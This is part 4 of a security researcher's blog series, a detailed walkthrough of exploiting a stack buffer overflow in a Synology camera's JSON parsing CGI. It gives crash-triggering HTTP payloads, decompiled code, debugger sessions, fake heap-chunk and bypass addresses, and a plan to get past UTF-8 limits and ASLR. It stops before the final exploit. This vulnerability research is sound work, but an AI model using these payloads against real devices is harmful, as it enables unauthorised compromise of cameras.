Welcome to the 4th part of this blog post series. If you have not read the previous blog posts, I recommend having a look at part 1, where we discuss how to extract the firmware from the camera, part 2, where we enumerate the attack surface, and part 3, where we discuss how we discovered the vulnerability.
We ended the last part by discovering that sending the following request resulted in us receiving some strange data from the web server:
PUT /syno-api/activate HTTP/1.1
Host: 10.0.0.2
Content-Type: application/json
Content-Length: 58
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA":"B"}
The corresponding HTTP response shows some strange data in the output:
HTTP/1.1 400 Bad Request
Cache-Control: no-cache, no-store, must-revalidate, private, max-age=0
Status: 400 Bad Request
Content-Type: text/plain
Content-Length: 99
Path [activate.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAè£JJð¢Jôe¤~Ôñv{] is not exist.
This is the hex encoding of the strange looking bytes. To us this immediately looked like memory addresses.
02 F0 A2 4A 02 F4 65 A4 7E D4 80 F1 76 7B
If we increase the length of the key in the JSON body:
PUT /syno-api/activate HTTP/1.1
Host: 10.0.0.2
Content-Type: application/json
Content-Length: 65
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA":"B"}
then we receive the following response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/plain
Cache-Control: no-cache, no-store, must-revalidate, private, max-age=0
Content-Length: 109
Date: Fri, 09 Jan 1970 23:36:22 GMT
Connection: close
Error 500: Internal Server Error
Error: CGI program sent malformed or too big (>16384 bytes) HTTP headers: []
Additionally, if we look at the filesystem, a core_dump_log.txt file was written in /tmp.
root@BC500_AD:/tmp$ cat core_dump_log.txt
synocam_param.c core dumped at 1970-01-10 00:36:22
This confirms that the synocam_param.cgi program crashed due to our input!
At this point it was time to switch from Burp to GDB, to determine what exactly went wrong.
To debug the synocam_param.cgi binary, we want to pass it the HTTP request information directly, without sending it through webd first. After some reversing, we discovered that most of the information is passed as environment variables, and the body is sent via stdin.
We extracted the necessary environment variables and created a bash script that sets them before starting the CGI binary. Most of the values can be static strings; only CONTENT_LENGTH and HTTP_CONTENT_LENGTH have to be adjusted according to the payload.
This is the script we came up with:
root@BC500_AD:/mnt/SD0$ cat headers.sh
export SERVER_NAME=IPCam
export SERVER_ROOT=/www
export DOCUMENT_ROOT=/www
export SERVER_SOFTWARE=Civetweb/1.7
export GATEWAY_INTERFACE=CGI/1.1
export SERVER_PROTOCOL=HTTP/1.1
export REDIRECT_STATUS=200
export SERVER_PORT=443
export REQUEST_METHOD=PUT
export REMOTE_ADDR=192.168.88.107
export REMOTE_PORT=51696
export REQUEST_URI=/syno-api/security.info
export SCRIPT_NAME=/syno-api/security.info
export SCRIPT_FILENAME=/www/camera-cgi/synocam_param.cgi
export PATH_TRANSLATED=/www
export HTTPS=on
export CONTENT_TYPE=application/json
export CONTENT_LENGTH=`wc -c body-compass.txt | cut -d ' ' -f 1`
export PATH=/sbin:/usr/sbin:/bin:/usr/bin
export HTTP_HOST=192.168.88.111
export HTTP_CONTENT_LENGTH=`wc -c body-compass.txt | cut -d ' ' -f 1`
export HTTP_CONTENT_TYPE=application/json
export HTTP_X_REQUESTED_WITH=XMLHttpRequest
export HTTP_SEC_CH_UA_MOBILE=?0
export HTTP_USER_AGENT=UserAgent
export HTTP_SEC_CH_UA_PLATFORM=""
export HTTP_ORIGIN=https://192.168.88.111
export HTTP_SEC_FETCH_SITE=same-origin
export HTTP_SEC_FETCH_MODE=cors
export HTTP_SEC_FETCH_DEST=empty
export HTTP_X_FILE_NAME=Compass-name
export HTTP_REFERER=https://192.168.88.111/
export HTTP_ZZAUTHORIZATION=Digest username="compass",realm="IPCam",nonce="33415195",uri="/syno-api/login",qop=auth,nc=00000001,cnonce="afd8bd70",response="9df1db1c008ae0fa152aaaa2258c5a2e"
export HTTP_ACCEPT_ENCODING=gzip, deflate
export HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.9
export HTTP_COOKIE=sid=Mb9gJBsDhYxuu2lhgBmNinW67pv3H4lJpOVJOJEx1R6PI1OS24BQTeXoELGzeuKa
export HTTP_CONNECTION=close
export RESPONSE_TO=SOCKET
export ACTION_PREPARE=yes
export ACTION_QUERY=yes
/www/camera-cgi/synocam_param.cgi < body-compass.txt
The body-compass.txt file simply contains the JSON payload we want to send to the CGI binary:
root@BC500_AD:/mnt/SD0$ cat body-compass.txt
{"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA":"B"}
If we now execute the script, a segfault occurs. This looks promising!
root@BC500_AD:/mnt/SD0$ ./headers.sh
Segmentation fault (core dumped)
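The idea behind the wrapper script can also be sketched in Python: the request metadata goes into environment variables, both length variables are derived from the body, and the body itself is written to stdin. This is only an illustrative sketch. The helper names build_cgi_env and run_cgi are hypothetical, and whether this reduced set of variables is enough for synocam_param.cgi is an assumption (the script above sets many more).

```python
import subprocess

# Path taken from the wrapper script above.
CGI_PATH = "/www/camera-cgi/synocam_param.cgi"


def build_cgi_env(body: bytes) -> dict:
    """Build a reduced CGI environment (hypothetical subset of the variables above)."""
    length = str(len(body))  # both length variables must match the body size
    return {
        "REQUEST_METHOD": "PUT",
        "REQUEST_URI": "/syno-api/security.info",
        "SCRIPT_NAME": "/syno-api/security.info",
        "SCRIPT_FILENAME": CGI_PATH,
        "CONTENT_TYPE": "application/json",
        "CONTENT_LENGTH": length,
        "HTTP_CONTENT_LENGTH": length,
        "PATH": "/sbin:/usr/sbin:/bin:/usr/bin",
    }


def run_cgi(body: bytes) -> subprocess.CompletedProcess:
    """Start the CGI binary with the body on stdin, like `cgi < body-compass.txt`."""
    return subprocess.run(
        [CGI_PATH], input=body, env=build_cgi_env(body), capture_output=True
    )


env = build_cgi_env(b'{"A":"B"}')
print(env["CONTENT_LENGTH"], env["HTTP_CONTENT_LENGTH"])
```

Deriving both values from len(body) avoids the mismatch that would occur if the payload file were edited without updating the lengths.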
Now it’s time to start GDB to determine the exact cause of the crash. For this, we modify the last line of our script to start the CGI binary using gdbserver. The gdbserver binary was not on the camera, so we cross-compiled it for 32-bit ARM and then copied it to the camera.
After the modifications, the script looks as follows:
root@BC500_AD:/mnt/SD0$ cat gdb_cgi.sh
export SERVER_NAME=IPCam
[...CUT...]
export ACTION_QUERY=yes
/mnt/SD0/tools/gdbserver localhost:2000 /www/camera-cgi/synocam_param.cgi < body-compass.txt
Now we can connect to the gdbserver from our attacker machine to debug synocam_param.cgi. For this, we start gdb-multiarch. We will use the gdb-gef and pwndbg plugins to improve the debugging experience.
Initially, we just let the script run without any breakpoints to examine the state when it crashes:
This looks really promising. At the moment of the crash, the registers $r0 and $r3 are set to 0x41414141. This is the hex representation of AAAA, meaning our input. The program tries to dereference our data and crashes because 0x41414141 is not a valid address. Thus, there is definitely a bug in the program, but is it also exploitable? To find out, we wanted to determine the exact location of the crash and track down how our input propagates through the program.
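As a quick sanity check, the link between the register value and our input can be reproduced in a few lines of Python. This is just an illustration of the byte-to-integer conversion on a little-endian 32-bit target, not part of the original tooling.

```python
import struct

# Four bytes of our JSON key, interpreted as a little-endian 32-bit value,
# the way the ARM core sees them when they end up in a register.
fragment = b"AAAA"
(register_value,) = struct.unpack("<I", fragment)
print(hex(register_value))
```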
The backtrace shows that the crash happened in libjansson, a JSON parsing library that is used by synocam_param.cgi.
Using GDB, the decompiled pseudo-code, and the source code of libjansson from GitHub, we started to analyze which functions are called when our request is handled, to determine where our input causes memory corruption.
In this blog post, we show the pseudo-code from the decompiler. Although it is not exact C code, it should not be too hard to read.
We start where synocam_param.cgi handles HTTP requests. If a PUT request is sent, the handle_put_req [1] function will be called.
undefined4 req_method_handlers(undefined4 req_info,undefined4 param_2,undefined4 *buffer)
{
  undefined4 uVar1;
  char *__s1;
  int iVar2;
  undefined4 uVar3;

  *buffer = req_info;
  buffer[1] = param_2;
  uVar1 = get_body(req_info,"format");
  uVar1 = get_file_extension_json_xml(uVar1);
  buffer[2] = uVar1;
  if (buffer[2] == 3) {
    uVar3 = buffer[1];
    uVar1 = get_body(req_info,"format");
    FUN_0001dd28(uVar3,400,"Unknown output format[%s]!",uVar1);
    uVar1 = 0xffffffff;
  }
  else {
    __s1 = (char *)FUN_0001c28c(req_info);
    if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"GET"), iVar2 != 0)) {
      if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"PUT"), iVar2 != 0)) {
        if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"POST"), iVar2 != 0)) {
          if ((__s1 == (char *)0x0) || (iVar2 = strcasecmp(__s1,"DELETE"), iVar2 != 0)) {
            FUN_0001dd28(buffer[1],400,"Wrong request method[%s]!",__s1);
            return 0xffffffff;
          }
          handle_delete_req(buffer);
        }
        else {
          handle_post_req(buffer);
        }
      }
      else {
        handle_put_req(buffer); // [1] handler for PUT request
      }
      [...CUT...]
}
The PUT request handler of synocam_param.cgi will first extract the body from the HTTP request and then call json_loads_wrapper [2] with the HTTP body as argument.
void handle_put_req(undefined4 *arg_req_info)
{
  int *piVar1;
  char cVar2;
  [...CUT...]
  int local_14;

  local_14 = __stack_chk_guard;
  req_body = get_body(*arg_req_info,"json");
  local_bc = (int *)json_loads_wrapper(req_body); // [2] the HTTP body is passed to json_loads_wrapper
  local_ac = json_load_file("/www/camera-cgi/synocam_config.json",0,0);
  pcVar3 = getenv("SCRIPT_NAME");
  [...CUT...]
}
Afterwards, this function will call json_loads [3], which lives in the shared library libjansson. The HTTP body of our request is passed as the first argument.
int * json_loads_wrapper(char *req_body)
{
  bool bVar1;
  int iVar2;
  char *pcVar3;
  int *local_30c;
  char str [256];
  undefined s [512];

  memset(s,0,0x200);
  memset(str,0,0x100);
  if (req_body == (char *)0x0) {
    local_30c = (int *)0x0;
  }
  else {
    local_30c = (int *)json_loads(req_body,4,0); // [3] json_loads from libjansson is called with the request body
    if (((local_30c == (int *)0x0) || ((local_30c != (int *)0x0 && (*local_30c == 7)))) &&
        (iVar2 = FUN_0001eda4(req_body,s,0x200), iVar2 == 1)) {
      bVar1 = true;
    }
    [...CUT...]
}
From now on, we are looking at functions from libjansson. We could theoretically use the source code from GitHub, but it was not trivial to determine which commit corresponds to libjansson.so.4.7.0. Thus, we will stick to the decompiler output.
The json_loads function will initialize a lex structure using the JSON body of the request [4]. The lex structure holds our input and information about how much of it has already been processed. Afterwards, the lex is passed to parse_json [5].
undefined4 json_loads(int req_body,undefined4 param_2,undefined4 param_3)
{
  int iVar1;
  int req_body_str;
  undefined4 local_5c;
  undefined lex [76];
  undefined4 return_val;

  FUN_00012f58(param_3,"<string>");
  if (req_body == 0) {
    error_set(param_3,0,"wrong arguments");
    return_val = 0;
  }
  else {
    local_5c = 0;
    req_body_str = req_body;
    iVar1 = init_buf(lex,&next_char,param_2,&req_body_str); // [4] create lex structure
    if (iVar1 == 0) {
      return_val = parse_json(lex,param_2,param_3); // [5] the lex structure is passed to parse_json
      lex_close(lex);
    }
    else {
      return_val = 0;
    }
  }
  return return_val;
}
The parse_json function performs some syntax checks and then passes the lex to parse_value [6].
int parse_json(int lex,uint param_2,int param_3)
{
  int iVar1;

  *(undefined4 *)(lex + 0x38) = 0;
  lex_scan(lex,param_3);
  if ((((param_2 & 4) == 0) && (*(int *)(lex + 0x3c) != 0x5b)) && (*(int *)(lex + 0x3c) != 0x7b)) {
    error_set(param_3,lex,"\'[\' or \'{\' expected");
    iVar1 = 0;
  }
  else {
    iVar1 = parse_value(lex,param_2,param_3); // [6] the lex is passed to parse_value
    if (iVar1 == 0) {
      iVar1 = 0;
    }
    [...CUT...]
}
The parse_value function decides what type of JSON value it has to process (e.g., integer, string, object). In our case, an object is processed, so parse_object is called with the lex as argument [7].
int parse_value(astruct *lex,uint param_2,undefined4 param_3)
{
  void *pvVar1;
  int iVar2;
  void *__s;
  size_t __n;
  undefined8 uVar3;
  int local_c;

  lex->field41_0x38 = lex->field41_0x38 + 1;
  if (0x800 < lex->field41_0x38) {
    error_set(param_3,lex,"maximum parsing depth reached");
    return 0;
  }
  iVar2 = lex->string_val;
  if (iVar2 == 0x101) {
    local_c = json_integer(lex->field43_0x40,lex->field44_0x44);
  }
  else if (iVar2 < 0x102) {
    if (iVar2 == 0x5b) {
      local_c = parse_array(lex,param_2,param_3);
    }
    else {
      if (iVar2 < 0x5c) {
        if (iVar2 == -1) {
          error_set(param_3,lex,"invalid token");
          return 0;
        }
LAB_00017114:
        error_set(param_3,lex,"unexpected token");
        return 0;
      }
      if (iVar2 == 0x7b) {
        local_c = parse_object(lex,param_2,param_3); // [7] our body is passed to the parse_object function
      }
      [...CUT...]
}
Finally, our input reaches the parse_object function. The __isoc99_sscanf function reads data from key, according to the format specifiers (%s), into the buffers overflow1 and overflow2 [8]. Note that sscanf with a plain %s does not perform any bounds checks, and the two buffers have a fixed size. This is where the memory corruption (a stack-based buffer overflow) occurs!
If the input data (key) is longer than the allocated buffers overflow1 and overflow2, the sscanf call will first fill the buffers, and then overwrite the stack variables n, local_14, key, local_c, and finally the return address that is stored on the stack.
int parse_object(struct *lex,uint flags,undefined4 error)
{
  void *pvVar1;
  int iVar2;
  undefined4 uVar3;
  undefined overflow1 [32]; // fixed size buffer
  char overflow2 [12]; // second fixed size buffer
  size_t n;
  int local_14;
  void *key;
  int local_c;

  local_c = json_object();
  if (local_c == 0) {
    local_c = 0;
  }
  else {
    lex_scan(lex,error);
    if (lex->string_val != L'}') {
      while (lex->string_val == 0x100) {
        key = (void *)lex_steal_string(lex,&n);
        if (key == (void *)0x0) {
          return 0;
        }
        pvVar1 = memchr(key,0,n);
        if (pvVar1 != (void *)0x0) {
          jsonp_free(key);
          error_set(error,lex,"NUL byte in object key not supported");
          goto error_label;
        }
        overflow2[0] = '\0';
        __isoc99_sscanf(key,"%s %s",overflow1,overflow2); // [8] user controlled key is read into the two stack buffers without bounds check
        if (((flags & 1) != 0) && (iVar2 = json_object_get(local_c,overflow1), iVar2 != 0)) {
          jsonp_free(key);
          error_set(error,lex,"duplicate object key");
          goto error_label;
        }
        lex_scan(lex,error);
        if (lex->string_val != L':') {
          jsonp_free(key);
          error_set(error,lex,"\':\' expected");
          goto error_label;
        }
        lex_scan(lex,error);
        local_14 = parse_value(lex,flags,error);
        if (local_14 == 0) {
          jsonp_free(key);
          goto error_label;
        }
        if (overflow2[0] == '\0') {
          *(undefined4 *)(local_14 + 8) = 0;
        }
        else {
          uVar3 = FUN_00016a04(overflow2);
          *(undefined4 *)(local_14 + 8) = uVar3;
        }
        iVar2 = json_object_set_nocheck(local_c,overflow1,local_14);
        if (iVar2 != 0) {
          jsonp_free(key);
          json_decref(local_14);
          goto error_label;
        }
        json_decref(local_14);
        jsonp_free(key);
        lex_scan(lex,error);
        if (lex->string_val != 0x2c) {
          if (lex->string_val == 0x7d) {
            return local_c;
          }
          error_set(error,lex,"\'}\' expected");
          goto error_label;
        }
        lex_scan(lex,error);
      }
      error_set(error,lex,"string or \'}\' expected");
error_label:
      json_decref(local_c);
      local_c = 0;
    }
  }
  return local_c;
}
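To get a feeling for how far a key has to reach, the stack layout can be modelled in a few lines of Python. This is a rough sketch under a loud assumption: the locals are taken to be contiguous, without padding, in exactly the order the decompiler lists them. The real frame may differ, and the distance between local_c and the saved return address (saved registers may sit in between) is not modelled at all.

```python
# Locals of parse_object in the order the decompiler lists them (name, size in bytes).
# ASSUMPTION: they sit contiguously on the stack in this order, without padding.
LOCALS = [
    ("overflow1", 32),
    ("overflow2", 12),
    ("n", 4),
    ("local_14", 4),
    ("key", 4),
    ("local_c", 4),
]


def offsets(layout):
    """Map each local to its byte offset from the start of overflow1."""
    result, position = {}, 0
    for name, size in layout:
        result[name] = position
        position += size
    return result


def clobbered(payload_len, layout=LOCALS):
    """List the locals touched when %s copies payload_len bytes plus a NUL into overflow1."""
    written = payload_len + 1  # sscanf appends a terminating NUL byte
    starts = offsets(layout)
    return [name for name, _ in layout if written > starts[name]]


print(offsets(LOCALS))
print(clobbered(31))  # fits into overflow1
print(clobbered(56))  # reaches into local_c under the assumed layout
```

Under this assumed layout, key starts 52 bytes after the beginning of overflow1, so any key longer than that begins to replace the pointer that is later handed to jsonp_free.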
It is worth emphasizing that the sscanf call is not present in the library’s source code hosted on GitHub (see https://github.com/akheron/jansson/blob/master/src/load.c#L662). No sscanf call is present in any of the commits:
$ git grep sscanf $(git rev-list --all)
$
Some further reverse engineering revealed that the developers modified libjansson to add further functionality to it. The sscanf call is part of those modifications.
Before starting to exploit the program, we should check what mitigations are in place:
$ checksec libjansson.so
Arch: arm-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: PIE enabled
The library has been compiled as position-independent code (PIE, so its load address can be randomized) and with NX enabled, but without stack canaries. Stack buffer overflows are usually exploited by overwriting the return address with a ROP chain. A ROP chain uses small code snippets already present in the program to make it perform attacker-defined behavior. If the return address is overwritten with a ROP chain, the program will execute the attacker's code once the current function returns.
But between the sscanf call and the function’s return, there is quite some code with many checks that we have to pass. Thus, the idea was to modify the JSON input so that it reaches a return statement as quickly as possible. One way to do this is to omit the colon “:” from the JSON input. This way, the following code path is taken [10]:
        if (lex->string_val != L':') { // [10] if no ":" in the string we go to error
          jsonp_free(key); // [11] key has to point to a chunk-like object to pass free
          error_set(error,lex,"\':\' expected");
          goto error_label;
        }
        [...CUT...]
error_label:
      json_decref(local_c); // [12] this call cannot fail
      local_c = 0;
    }
  }
  return local_c; // [13] return from function, overflow to control $pc
}
If we overflow the buffer, we will overwrite the stack variable key in the process. This variable is the argument to jsonp_free(key) [11] (a wrapper around glibc’s free). Thus, to avoid crashing on this code path, key has to be a valid value for free. The screenshot below shows the memory state before the call to jsonp_free(key). The register $r0 holds the first argument to free, which is unsurprisingly 0x41414141.
To not crash the program, we have to overwrite key with a value that is a valid heap chunk or looks like one.
We decided to look for a fake heap chunk in a library. Otherwise, we would have to brute-force not only the library address for ROP gadgets but also the heap base. The fake chunk needs to be in a writable memory region, as free will write pointers and metadata into the freed chunk. Additionally, the chunk header (the 4 bytes before the chunk) should be valid. We also want the previous-chunk-in-use bit to be set in our fake header, so that free will not merge/coalesce the fake chunk with the preceding one.
If you’re not familiar with how the glibc heap works, I highly recommend reading the following article: https://azeria-labs.com/heap-exploitation-part-1-understanding-the-glibc-heap-implementation/.
In GDB, we discover that address 0x76fcd3a0 in libjansson’s writable region fulfills these requirements. The word at address 0x76fcd39c [15] looks like a heap chunk header of size 0x40 with the previous-in-use bit (0x1) set.
gef> vmmap
0x76fae000 0x76fbd000 0x0000f000 0x00000000 r-x /lib/libjansson.so.4.7.0 <- $r2, $lr
0x76fbd000 0x76fcc000 0x0000f000 0x0000f000 --- /lib/libjansson.so.4.7.0
0x76fcc000 0x76fcd000 0x00001000 0x0000e000 r-- /lib/libjansson.so.4.7.0
0x76fcd000 0x76fce000 0x00001000 0x0000f000 rw- /lib/libjansson.so.4.7.0
gef> x/16wx 0x76fcd3a0-16
0x76fcd390: 0x00000001 0x00000004 0x00000000 0x00000041 // [15] fake chunk header
0x76fcd3a0: 0x00000009 0x00468008 0x00001484 0x00001484 // fake chunk
0x76fcd3b0: 0x000000a0 0x00000003 0x00000000 0x00000004
0x76fcd3c0: 0x00000008 0x0000004a 0x00000009 0x00000042
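The way the word 0x00000041 is read as a chunk header can be sketched as follows. The flag values are the well-known low bits of glibc's size field; the helper name parse_size_field is hypothetical, and the sketch only decodes the header. It does not model the other sanity checks that free performs.

```python
# Low bits of the glibc malloc size field.
PREV_INUSE = 0x1      # previous chunk is in use, so free() does not coalesce backwards
IS_MMAPPED = 0x2
NON_MAIN_ARENA = 0x4
SIZE_SZ = 4           # width of the size field on 32-bit ARM


def parse_size_field(raw):
    """Split a raw size field into the chunk size and its flag bits."""
    return {
        "size": raw & ~(PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA),
        "prev_inuse": bool(raw & PREV_INUSE),
        "is_mmapped": bool(raw & IS_MMAPPED),
        "non_main_arena": bool(raw & NON_MAIN_ARENA),
    }


header_address = 0x76FCD39C           # word marked [15] in the dump above
header = parse_size_field(0x00000041)
chunk_pointer = header_address + SIZE_SZ  # pointer value that free() expects
print(hex(chunk_pointer), header)
```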
While debugging, we will set key to the fake chunk address 0x76fcd3a0 before the call to jsonp_free, so that we can continue creating our proof of concept.
By omitting the colon in the JSON payload and supplying a suitable fake chunk, we can make the program skip most of the code and go directly to the error_label [12]. There, local_c, a stack variable that was also overwritten, is passed to json_decref. The function tries to decrease the reference count of the JSON object. But if a_local_c + 4 points to the value -1 [16], all checks are skipped and the function returns immediately.
void json_decref(int a_local_c)
{
  if ((a_local_c != 0) && (*(int *)(a_local_c + 4) != -1)) { // [16] if a_local_c + 4 is -1, we directly return
    *(int *)(a_local_c + 4) = *(int *)(a_local_c + 4) + -1;
    if (*(int *)(a_local_c + 4) == 0) {
      json_delete(a_local_c);
    }
  }
  return;
}
It is not hard to find an address that holds the value 0xffffffff (-1). We decided to use 0x76fac530.
gef> x/16wx 0x76fac520
0x76fac520: 0x00002800 0xffffffff 0xffffffff 0xffffffff
0x76fac530: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
0x76fac540: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
0x76fac550: 0xffffffff 0xffffffff 0xffffffff 0xffffffff
Again, for our proof of concept, register $r3 is set to 0x76fac530-4 in json_decref to bypass this check.
Afterwards, execution is continued until the program crashes. We can see that the program counter $pc was successfully overwritten!
We now modify the payload to contain the two addresses that correctly overwrite key and local_c, and then just overwrite the return address with a ROP chain. Thus, exploitation should be trivial, right? Wrong!
Unfortunately, there are a few more problems that have to be tackled. Recall that the payload is sent as a JSON key. In libjansson, the JSON key is of type TOKEN_STRING. If we look at the documentation (https://jansson.readthedocs.io/en/2.7/apiref.html#string), we read the following:
Jansson uses UTF-8 as the character encoding. All JSON strings must be valid UTF-8 (or ASCII, as it’s a subset of UTF-8). All Unicode codepoints U+0000 through U+10FFFF are allowed, but you must use length-aware functions if you wish to embed NUL bytes in strings.
This means we can only use valid UTF-8 in our payload, which severely limits the available gadgets. Additionally, JSON_ALLOW_NUL is not set, so the payload cannot contain null bytes. As a result, only the single bytes 0x01-0x7F (minus whitespace such as 0x20 / space, which ends the %s conversion in sscanf) can be used directly.
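These constraints can be turned into a small checker for candidate byte strings. This is a sketch, not the validation code of the modified library: the function name usable_in_key is hypothetical, Python's UTF-8 decoder stands in for libjansson's validation, and all C whitespace characters are treated as unusable because %s stops at them.

```python
# Bytes that end a %s conversion in sscanf (C whitespace).
WHITESPACE = b" \t\n\r\x0b\x0c"


def usable_in_key(data: bytes) -> bool:
    """Return True if data could be placed in one contiguous %s-copied part of the key."""
    if b"\x00" in data:
        return False  # JSON_ALLOW_NUL is not set
    if any(byte in WHITESPACE for byte in data):
        return False  # %s would stop copying here
    try:
        data.decode("utf-8")  # stand-in for the library's UTF-8 validation
    except UnicodeDecodeError:
        return False
    return True


print(usable_in_key(b"AAAA"))
print(usable_in_key(b"A B"))
print(usable_in_key(b"\x83\x8b"))
```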
Luckily, UTF-8 also has multi-byte sequences (we call them surrogate pairs in the rest of this post, although strictly speaking that term belongs to UTF-16). This means that one Unicode character is encoded as two or more bytes. For example, \u0080 (a control character) is encoded as the two bytes C2 80.
The following image shows what UTF-8 code points can be encoded in 1-4 bytes:
You can read more about UTF-8 here: https://en.wikipedia.org/wiki/UTF-8.
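The relationship between a code point and the number of bytes it occupies can be checked directly in Python. The snippet below is only an illustration; the helper name utf8_length is made up for this post.

```python
def utf8_length(code_point: int) -> int:
    """Number of bytes the given code point occupies in UTF-8."""
    return len(chr(code_point).encode("utf-8"))


# Code points on both sides of each length boundary.
for cp in (0x7F, 0x80, 0x7FF, 0x800, 0xFFFF, 0x10000, 0x10FFFF):
    encoded = chr(cp).encode("utf-8")
    print(f"U+{cp:04X} -> {utf8_length(cp)} byte(s): {encoded.hex()}")
```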
This is actually very useful. By using such a multi-byte sequence (surrogate pair), we can place a byte above 0x7F (e.g., 0x80) in our payload, as long as we accept that the neighboring byte is clobbered with a predefined value (0xC2 in the example above). Let’s take a quick detour before we come back to how this helps us write an exploit.
The system is configured with 8-bit ASLR. This means that 8 bits of every address will be random. We determined this empirically by invoking the synocam_param.cgi binary multiple times, as well as with the following command:
root@BC500_AD:/proc/sys/vm$ cat /proc/sys/vm/mmap_rnd_bits
8
For instance, in the address 0xABCDEFGH, the two hex digits D and E are chosen at random for each invocation of synocam_param.cgi. Luckily, 8 bits allow only 256 possibilities, so a brute-force approach is feasible.
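How many attempts such a brute-force needs can be estimated with a short calculation. The sketch below assumes that every invocation draws the 8 random bits independently and uniformly, which is our simplification and not something we verified on the camera.

```python
import math


def success_probability(attempts: int, random_bits: int = 8) -> float:
    """Chance that at least one of `attempts` guesses matches the random bits."""
    per_try = 1 / 2 ** random_bits
    return 1 - (1 - per_try) ** attempts


def attempts_needed(target_probability: float, random_bits: int = 8) -> int:
    """Smallest number of attempts that reaches the target success probability."""
    per_try = 1 / 2 ** random_bits
    return math.ceil(math.log(1 - target_probability) / math.log(1 - per_try))


print(success_probability(256))
print(attempts_needed(0.5))
```

With a fixed guess, the expected number of attempts until the first hit is 256 under the same assumption.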
For the attack, we might want to encode the address of a function at 0x76838b34. Recall that we cannot do this using single-byte UTF-8 characters, as 0x83 and 0x8b are larger than 0x7f. We mentioned that multi-byte sequences (surrogate pairs) can be used to encode two bytes together. Is it possible to encode 0x838b this way? Unfortunately, it is not: in little-endian order, 0x8b comes first in memory, and bytes in the range 0x80-0xBF are only valid as continuation bytes, never as the first byte of a UTF-8 sequence.
This is where ASLR comes to our help. In 0x76838b34, the 8 bits 0x38 will be randomized. Thus, we can choose them to be anything and just re-run the exploit until ASLR aligns with our guess/choice. If we set the ASLR bits to be 0x3d, the final address becomes 0x7683db34. This can then be encoded as \u0034\u06c3v (little-endian byte order): \u0034 is 0x34, \u06c3 is a two-byte sequence (surrogate pair) that encodes to the bytes DB 83 (0x83DB as a little-endian value), and v represents 0x76.
Please note that once we have chosen the ASLR bits, all our gadgets have to be encodable using those values.
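The encoding step can be automated with a small helper that tells us whether an address is expressible as a JSON key fragment and which choices of the ASLR bits make it so. This is a sketch under assumptions: encode_address and encodable_aslr_values are hypothetical names, Python's UTF-8 decoder stands in for libjansson's validation, and the random bits are assumed to be bits 12-19 (the digits D and E in 0xABCDEFGH).

```python
import json
import struct

# Bytes we cannot use: NUL and the whitespace characters that end %s.
FORBIDDEN = set(b"\x00 \t\n\r\x0b\x0c")


def encode_address(address: int):
    """Return the JSON-escaped key fragment for a 32-bit address, or None."""
    raw = struct.pack("<I", address)  # little-endian, as stored on the stack
    if any(byte in FORBIDDEN for byte in raw):
        return None
    try:
        text = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None  # not a valid UTF-8 byte sequence
    return json.dumps(text)[1:-1]  # non-ASCII becomes \uXXXX, quotes stripped


def encodable_aslr_values(address: int, shift: int = 12):
    """All values of the 8 random bits for which the address stays encodable."""
    base = address & ~(0xFF << shift)
    return [v for v in range(256) if encode_address(base | (v << shift)) is not None]


print(encode_address(0x76838B34))  # ASLR bits 0x38
print(encode_address(0x7683DB34))  # ASLR bits 0x3d
print([hex(v) for v in encodable_aslr_values(0x76838B34)])
```

Running the same check over every gadget address in a candidate chain shows which ASLR values, if any, work for all of them at once.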
The plan now is to call the system function with an attacker-controlled argument. For this, we have to find gadgets whose addresses can be encoded as single-byte or multi-byte UTF-8 sequences, and combine them into a ROP chain that executes arbitrary commands on the camera. While creating a ROP chain like this is possible, there is an easier way to achieve command execution.
Stay tuned for part 5 of this series where we will explain how we exploited the vulnerability in the end: